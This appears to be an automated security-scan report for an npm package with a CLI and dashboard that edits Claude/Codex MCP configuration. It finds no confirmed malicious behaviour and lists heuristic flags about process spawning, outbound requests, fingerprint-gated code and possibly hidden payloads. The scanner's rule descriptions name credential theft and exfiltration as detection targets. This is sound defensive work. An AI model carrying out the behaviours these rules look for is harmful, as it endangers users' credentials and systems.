AI Security Review
scanned 2h ago · by lpm-firewall-aiNo confirmed malicious attack surface was established. The package has explicit user-invoked workflow/dashboard features that can start local processes and manage Claude/Codex MCP config, but no install-time mutation, exfiltration, or remote payload execution was found.
Decision evidence
public snapshot- Dashboard MCP routes can modify ~/.codex/config.toml, ~/.claude.json, and project .mcp.json via API endpoints.
- Runtime commands use child_process for relaunch, dashboard start/stop, browser open, and optional dev startup.
- Package ships AI-agent extension directories (.claude/.codex/.agents/.agy) in package files.
- package.json has no preinstall/install/postinstall hook; only prepublishOnly build scripts.
- bin/maestro.js only self-relaunches node with WASM flags then imports CLI.
- dist/src/commands/view.js/stop.js network calls are localhost dashboard health/workspace/shutdown APIs.
- dashboard MCP config mutation is explicit runtime dashboard/API functionality, not install-time hijack.
- test_aco.py is plain Python test code for bundled team-swarm scripts, not binary/hidden payload.
- No credential harvesting or external exfiltration endpoint found in inspected hot files.
Source & flagged code
11 flagged · loading sourcePackage source references dynamic require/import behavior.
dist/src/migrations/_template.jsView on unpkg · L44Package source references weak cryptographic algorithms.
dist/src/tools/core-memory.jsView on unpkg · L31A single source file combines environment access, network access, and code or shell execution; review context before blocking.
dist/src/commands/view.jsView on unpkg · L181Source combines command execution, command-output handling, and outbound requests; review data flow before blocking.
dist/src/commands/view.jsView on unpkg · L196Package source invokes a package manager install command at runtime.
dist/src/commands/view.jsView on unpkg · L116Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.
dashboard/dist-server/dashboard/src/server/routes/mcp.jsView on unpkg · L10Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.
dist/src/tools/impeccable/live/server.jsView on unpkg · L1Package hides binary, compressed, or executable-looking payloads in test/fixture/hidden paths.
.agents/skills/team-adversarial-swarm/scripts/test_aco.pyView on unpkgPackage ships non-JavaScript build or shell helper files.
.agents/skills/team-adversarial-swarm/scripts/test_aco.pyView on unpkg